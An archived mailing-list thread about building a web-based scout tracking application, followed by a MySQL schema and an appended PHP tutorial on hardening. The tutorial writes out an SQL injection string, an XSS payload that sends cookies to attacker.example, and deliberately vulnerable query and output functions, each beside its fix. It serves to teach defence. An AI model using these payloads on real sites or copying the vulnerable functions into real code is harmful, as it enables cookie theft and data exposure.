Re: [Ldsoss] Scout Tracking

2006-08-31 Thread Stacey

Steven H. McCown wrote:

> The key is that if you don’t *really* have to be web-accessible, then
> don’t.

If it isn't web-accessible then parents continue to be largely "out of 
the loop" on their son's status in scouts and we continue to spend money 
out of our YM budgets for TroopMaster licenses. Why would we want to 
take the time to change to save about $40/yr? However, collectively with 
all the wards this could add up for the Church as a whole. We don't 
think collectively at the ward level, however. Therefore, $40/yr for 
scout tracking software can be easily budgeted for to save a headache.


Each parent could have their own copy of the scout tracking software... 
Wrong. Installing and supporting an application on every parent's 
computer is impractical. We would end up fixing parents' operating 
system issues for the most part. Scout masters want to be scout masters 
and not software support specialists.


IMHO,

-stacey.
___
Ldsoss mailing list
Ldsoss@lists.ldsoss.org
http://lists.ldsoss.org/mailman/listinfo/ldsoss


RE: [Ldsoss] Scout Tracking

2006-08-31 Thread Steven H. McCown

There are some more serious security implications with your choice of tools
(e.g., injections).  Far from the definitive word, these are hotly debated,
demonstrated, and refuted.  Here are a couple of blog articles that you should
research and consider re PHP:

- PHP Insecurity: Failure of Leadership (http://www.greebo.net/?p=320)

- PHP Security: Dumb Users or Dumb APIs? (http://www.sitepoint.com/blogs/2006/01/24/php-security-dumb-users-or-dumb-apis/)

This is from last year’s Blackhat, but it’s fairly new and still relevant:

- Beefed up OWASP 2.0 introduced at BlackHat (http://searchsecurity.techtarget.com/originalContent/0,289142,sid14_gci443,00.html)
  and (http://www.owasp.org/index.php/Main_Page)

How to harden this?  It’s a moving target.  PHP6?  Until it is released and
then I’ll say PHP7…   ;-)

The key is that if you don’t *really* have to be web-accessible, then don’t.

Steve


From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Oscar Schultz
Sent: Friday, August 18, 2006 5:48 PM
To: [EMAIL PROTECTED]; LDS Open Source Software
Subject: Re: [Ldsoss] Scout Tracking

you ever get the table definitions done as SQL?

Hello list,

Between scout camp, yw camp and family reunions I have done some but
not as much as I wanted to the tracker.

Below is what I currently have.

The question for the list is how to make the user interface
secure.

The tools I have selected are mysql, php5, pear, apache2, and
linux as the base os.

The application will run as a web server (server side code rather
than JavaScript) and will require cookies.

I have been reading about cross-site scripting attacks (XSS). XSS
looks to be a serious problem since it uses man in the middle to steal cookies.

Anyone have some ideas how to harden a web application so I can
avoid design problems upfront?

thanks

oscar 

create database tracker;

# the user@host was scrubbed to [EMAIL PROTECTED] by the list archive;
# substitute the application's own account
grant create,alter,select,insert,update,delete on tracker.* to [EMAIL PROTECTED];

use tracker;

# MySQL allows one auto_increment column per table and it must be a key, so
# each table below gets a primary key on record_id and the "people_record_id"
# style columns are plain foreign keys instead of auto_increment.
# Columns the original listed as "date ?" are named record_date here.

# the table to record personal information
create table people (
    record_id            int unsigned not null auto_increment,
    firstname            varchar(30) not null default '',
    middlename           varchar(30) not null default '',
    lastname             varchar(30) not null default '',
    preferredname        varchar(30) not null default '',
    gender               varchar(1),
    birthdate            varchar(2),
    birthmonth           varchar(3),
    birthyear            varchar(4),
    emergency_passphrase varchar(30),
    record_date          date,       # listed as an unnamed "date" column in the original
    primary key (record_id)
);

# the table to record personal address information
# 1 people record to many address record relationship
create table address (
    record_id        int unsigned not null auto_increment,
    people_record_id int unsigned not null,
    address1         varchar(40),
    address2         varchar(40),
    city             varchar(40),
    county           varchar(40),
    state            varchar(40),
    zipcode          varchar(9),
    type             varchar(10),  # (primary, secondary, mailbox, residence, shipping, other, unknown)
    record_date      date,
    primary key (record_id),
    foreign key (people_record_id) references people (record_id)
);

# the table to record personal phone information
# 1 people record to many phone record relationship
create table phone (
    record_id        int unsigned not null auto_increment,
    people_record_id int unsigned not null,
    type             varchar(10),  # (personal cell, home, business, home2, business cell)
    area_code        varchar(3),
    number           varchar(7),
    extension        varchar(7),
    record_date      date,
    primary key (record_id),
    foreign key (people_record_id) references people (record_id)
);

# a table to record emergency contacts
# 1 personal to many personal relationship
# (the original named both people columns people_record_id, which MySQL
# rejects; they are split into participant and contact here)
create table emergency_contact (
    record_id             int unsigned not null auto_increment,
    participant_record_id int unsigned not null,  # the participant
    contact_record_id     int unsigned not null,  # the emergency contact
    relationship          varchar(32),            # string
    record_date           date,
    primary key (record_id),
    foreign key (participant_record_id) references people (record_id),
    foreign key (contact_record_id) references people (record_id)
);

# the authorization table to control access via the
# web interface
# (the original listed these columns without types; the types below are assumed)
create table auth (
    record_id           int unsigned not null auto_increment,
    fname               varchar(30),   # first_name
    mname               varchar(30),   # middle_name
    lname               varchar(30),   # last_name
    userid              varchar(30) not null,
    password            varchar(255),  # should hold a password hash, never the clear-text password
    password2           varchar(255),
    auth_level          int unsigned,
    email               varchar(128),
    password_start_date date,
    password_status     varchar(10),
    record_date         date,
    primary key (record_id),
    unique key (userid)
);

# a table to record the high level in the hierarchy
# of the award requirement, subrequirement chain
create table awards (
    record_id   int unsigned not null auto_increment,
    name        varchar(128),   # the name of the award
    org_group   int unsigned,   # link to the group record (no group table is defined in the post)
    max_age     int unsigned,   # max age the award can be obtained
    min_age     int unsigned,   # minimum age for award
    record_date date,
    primary key (record_id)
);

# a table to record each completed award
# many awards to 1 people relationship
create table completed_awards (
    record_id        int unsigned not null auto_increment,
    people_record_id int unsigned not null,
    award_record_id  int unsigned not null,
    date_completed   varchar(9),   # ddmmm
    primary key (record_id),
    foreign key (people_record_id) references people (record_id),
    foreign key (award_record_id) references awards (record_id)
);

# a table to record which image file relates to which person
# each file is a scanned image of the medical form
create table medical_form (
    record_id        int unsigned not null auto_increment,
    people_record_id int unsigned not null,
    image_record_id  int unsigned not null,   # the image table's definition is cut off below
    record_date      date,
    primary key (record_id),
    foreign key (people_record_id) references people (record_id)
);

# a table to record which image file related to which person

# and
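The three risks raised in the thread (Oscar's question about XSS and cookie theft, and Steve's mention of injection) each have a well-understood hardened form in PHP5/mysqli. The block below is an added example written for this page, not code from the original posts or from the tracker project. It is written against the `people` table in the posted schema and assumes a `mysqli` connection `$db` supplied by the caller and a site served over HTTPS; the function names, the constructed payloads, and the `h()` helper are this example's own.

```php
<?php
// Added example (not from the original post): vulnerable form beside the
// hardened form for SQL injection, XSS, and session-cookie exposure.
// Assumes a mysqli connection $db from the caller and the posted "people" table.

// --- 1. SQL injection: string splicing vs. a prepared statement -------------

// Vulnerable: the last name is concatenated into the query text. A value of
//   ' OR '1'='1
// returns every row, and a stray quote breaks the statement outright.
function find_people_vulnerable(mysqli $db, $lastname) {
    $sql = "SELECT record_id, firstname, lastname FROM people "
         . "WHERE lastname = '" . $lastname . "'";
    return $db->query($sql);
}

// Hardened: the query text is fixed and the value is sent as a bound
// parameter, so the database never parses it as SQL (mysqli, PHP 5.0+).
function find_people(mysqli $db, $lastname) {
    $stmt = $db->prepare(
        "SELECT record_id, firstname, lastname FROM people WHERE lastname = ?");
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $stmt->bind_param('s', $lastname);        // 's' = bind as a string
    $stmt->execute();
    $stmt->bind_result($id, $first, $last);
    $rows = array();
    while ($stmt->fetch()) {
        $rows[] = array('record_id' => $id, 'firstname' => $first, 'lastname' => $last);
    }
    $stmt->close();
    return $rows;
}

// --- 2. XSS: escape every untrusted value where it enters the HTML ----------

// Vulnerable: a stored name echoed straight into the page. A firstname of
//   <script>document.location='http://attacker.example/?c='+document.cookie</script>
// runs in the browser of every parent who views the roster and ships their
// cookie off-site; no man in the middle is needed.
function render_name_vulnerable($firstname) {
    return '<td>' . $firstname . '</td>';
}

// Hardened: entity-encode for the HTML body/attribute context. ENT_QUOTES
// covers both quote styles so the value is also safe inside a quoted attribute.
function h($value) {
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

function render_name($firstname) {
    return '<td>' . h($firstname) . '</td>';
}

// --- 3. Cookies: keep the session id out of reach of script and plain HTTP --

// Call before session_start(). HttpOnly stops document.cookie from exposing
// the session id (PHP 5.2+); the secure flag keeps it off plaintext HTTP, so
// this assumes the site is served over HTTPS. use_only_cookies refuses
// session ids passed in the URL.
function start_hardened_session() {
    $lifetime = 0;        // browser-session cookie
    $path     = '/';
    $domain   = '';       // current host only
    $secure   = true;
    $httponly = true;
    session_set_cookie_params($lifetime, $path, $domain, $secure, $httponly);
    ini_set('session.use_only_cookies', '1');
    session_start();
}

// Self-check of the escaper on a constructed payload; needs no database.
$payload = "<script>alert(document.cookie)</script>";
assert(render_name($payload)
    === '<td>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</td>');
```

The same pattern applies to every other input the tracker accepts: bind it when it goes into MySQL, encode it when it comes back out into HTML, and never let the session id travel where script or a plaintext network path can read it.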